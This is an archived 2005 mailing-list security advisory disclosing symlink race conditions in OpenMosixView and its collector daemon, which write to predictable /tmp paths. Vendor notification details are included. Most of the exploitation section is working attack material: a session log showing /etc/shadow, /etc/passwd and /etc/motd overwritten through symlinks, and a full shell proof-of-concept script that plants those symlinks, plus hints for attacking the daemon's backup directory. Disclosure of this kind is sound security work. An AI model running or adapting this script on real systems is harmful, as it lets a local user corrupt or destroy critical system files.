lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050325055702.55f3ee8e@localhost.localdomain>
Date: Fri, 25 Mar 2005 05:57:02 +0400
From: rexolab <research@...otec.com>
To: <vulndb@...unia.com>, <news@...uriteam.com>,
	<full-disclosure@...ts.netsys.com>, <bugs@...uritytrackers.com>,
	<bugtraq@...urityfocus.com>, <cert@...t.org>, <research@...otec.com>
Subject: RX250305 - OpenMosixView : Multiple Race conditions - advisory and
 exploit


             __________                     __
             \______   \ ____ ___  ________/  |_  ____   ____
              |       _// __ \\  \/  /  _ \   __\/ __ \_/ ___\
              |    |   \  ___/ >    <  <_> )  | \  ___/\  \___   
              |  __|___/\___  >__/\__\____/|__|  \_____>\___  >
              \_/           \/                _ research>   \/                       
               .
	       
 |############################ REXOTEC(dot)COM ##############################
 |
 |=------=[ ADV RX250305 - OpenMosixView : Multiple Race conditions ]------=|
 |
 |
 |=---[ - INFORMATION
      `---------------------------------------------------------------------| 
      
   VulnDiscovery:       2004/12/21
   Release Date :       2005/03/25
   Author       :       Gangstuck and Psirac <research@...otec.com>

   Application  :       OpenMosixView
   Affected     :       All version (lastest is openmosixview-1.5)
   Platform     :       Linux
   Risk         :       Critical
   Severity     :       Allow local user to compromise filesystem.

   Vendor       :       http://www.openmosixview.com/
   Reference    :       http://www.rexotec.com/advisory/RX250305.html

   Status       :       Vendor has been notified (2005/02/17) and will try to 
                        fix the topics  listed above for the next  release of 
			OMView. This may  take some time  because  of general 
			architecture  changes  for  OpenMosix on 2.6. kernels.
			

 |=---[ - SUMMARY OVERVIEW
      `---------------------------------------------------------------------| 
      
   OpenMosix is a Linux kernel extension for single-system image clustering 
   which turns a network of ordinary computers into a supercomputer.
   
   OpenMosixView is an intuitive cluster-management GUI for openMosix cluster. 
   
   It contains eight usefull applications for monitoring and administrating 
   openMosix-cluster. In the package, OpenMosixCollector is the daemon 
   which should/could be started on one cluster-member. It logs openmosix
   load of each node. These history log-files are analyzed by some 
   openMosix Analyzer located in the pack to gives a non-stop overview 
   of the load, memory and processes in a cluster.
   
   
 |=-+-[ - VULNERABILITIES OVERVIEW 
    | `---------------------------------------------------------------------|  
    |
 .--+-[ OpenMosixView ]
 |   
 |  When OpenMosixView is started, it get nodes's names (or by default 
 |  nodes's IP) with "mosctl whois id_node_number", and redirect output 
 |  in /tmp/nodes.tmp without checking if file already exist, ...
 |   
 +--.
    |
    '--[ OpenMosixView->OpenmosixCollector ]
    
   At each start of the OpenMosixCollector daemon, load of each node is 
   formatted to the directory /tmp/openmosixcollector where data are 
   organised in several files. 
   
   The startup schema is :
   
   	[ file ] cluster
	[ file ] IDnode-n
	[ file ] IDnode-n
   	[ file ] sync.count
	[ dir  ] phist
	
   Permissions are correctly handled .. 
   
	drwxr-xr-x   3 root root  1024 2004-12-23 18:54 openmosixcollector
	|
	`-----  -rw-r--r--   1 root root 42674 2004-12-21 22:20 1
		-rw-r--r--   1 root root 42612 2004-12-21 22:20 11
		-rw-r--r--   1 root root 41444 2004-12-21 22:20 2
		-rw-r--r--   1 root root 42063 2004-12-21 22:20 22
		-rw-r--r--   1 root root 41486 2004-12-21 22:20 cluster
		drwxr-xr-x   2 root root 24576 2004-12-21 22:20 phist
		-rw-r--r--   1 root root     4 2004-12-21 22:20 sync.count
   
	
   but, creation of predictable files allow any local attacker to remove 
   arbitrary files on the vulnerable filesystem via the famous symlink 
   vulnerability. In this case, we just have to rebuild a fake directory 
   tree. 
   
   If openmosixcollector-daemon is already running there is also a way to 
   corrupt the fs due to the creation of a predictable backup temporary 
   directory each 12 hours (see exploit below for more details). 

   
 |=---[ - EXPLOITATION
      `---------------------------------------------------------------------| 

	$ ./RX_OMcollector_proof.sh
	...
	$ ls -l /tmp/nodes.tmp
	lrwxrwxrwx  1 gang gang 12 2005-02-21 23:18 /tmp/nodes.tmp -> /etc/shadow
	
	# openmosixview &
	openMosix is started!
	openMosix cluster contains 3 members.
	cluster config changed! redraw cluster now.
	
	$ cat /etc/shadow
	192.168.0.11
	
	# /etc/init.d/openmosixcollector start
	Initializing openMosix...
	openMosix configuration was successful :)
	
	# ls -l /tmp/openmosixcollector/
	rwxrwxrwx   1 user user   12 2004-12-21 23:19 cluster -> /etc/passwd
	drwxr-xr-x  2 root root 1024 2004-12-21 23:25 phist
	lrwxrwxrwx  1 user user   12 2004-12-21 23:19 sync.count -> /etc/motd
	# cat /etc/passwd
	21.12.2005-23.25.59 5 184 1757 13 3
	21.12.2005-23.26.10 5 184 1757 13 3
	# cat /etc/motd
	2
	

|=---[ - EXPLOIT - Proof of concept
     `----------------------------------------------------------------------|


---8<--------8<-------cut-here-------8<--------8<---

#!/bin/sh
#################################################################
# RX_oMcollector_proof.sh
# OpenMosixCollector exploit [25/03/2005]
# by Gangstuck and Psirac <research@...otec.com>
#################################################################

# -- Choose target
TARGET1="/etc/shadow"	# OM view target
TARGET2="/etc/passwd"	# OM collector target 1
TARGET3="/etc/motd"	# OM collector target 2

# -- OpenMosixCollector temporary directory (without final '/')
OMCTDIR="/tmp/openmosixcollector"

echo "--------------------------------------------------------"
echo "-       -= OpenMosixView and OpenMosixCollector =-     -"
echo "-              Symlink Vulnerability PoC               -"
echo "-                [versions 1.5 and minor]              -"
echo "--------------------------------------------------------"
echo "-                  Gangstuck and Psirac                -"
echo "-                 <research@...otec.com>               -"
echo "--------------------------------------------------------"

# -- OM View
ln -sf $TARGET1 /tmp/nodes.tmp
if [ $? ]; then
   echo "[+] OpenMosixView attack successfully launched."
   echo -e "    - target is ${TARGET1}\n"
else
   echo "[!] Failed to exploit OpenMosixView..."
fi

# -- OM Collector
if [ -d "$OMCTDIR" ]; then
echo -e "[!] Openmosix is already running.\n
   Anyway, there is a way to exploit this case but this is not 
   implemented in this public exploit. OpenMosixcollector-daemon 
   automatically restarts every 12 hours and saves the current 
   history to a directory located in /tmp (glibc: P_tmpdir).
   
   This is done whith the utilisation of a predictable temporary
   dir name \"${OMCTDIR}_[date]\" where [date] format 
   look like \"18.0.2005-0.0.48\". Have phun :P"
   exit 0
fi
	
echo -e "[-] OpenMosixCollector seems not to be started..."
echo "    - creating fake directory"
mkdir $OMCTDIR
if [ ! $? ]; then
   echo "[!] OpenMosixCollector attack failed !"
   exit 1
fi
echo "    - creating symlink attack against "
echo -e "\t> ${TARGET2}" && ln -sf $TARGET2 ${OMCTDIR}/cluster; 
echo -e "\t> ${TARGET3}" && ln -sf $TARGET3 ${OMCTDIR}/sync.count; 

echo "[+] OpenMosixCollector attack successfully launched."

---8<--------8<-------cut-here-------8<---------8<---



|=---[ - ABOUT
     `----------------------------------------------------------------------|

     Rexotec is a company specialized in the corporate network which offers
     to professionals several solutions based on free software. It offers 
     services in the field of security such as penetration testing and tends
     to be active in software auditing.


-- 
cheers,
gangstuck and psirac <research@...otec.com>   



Powered by blists - more mailing lists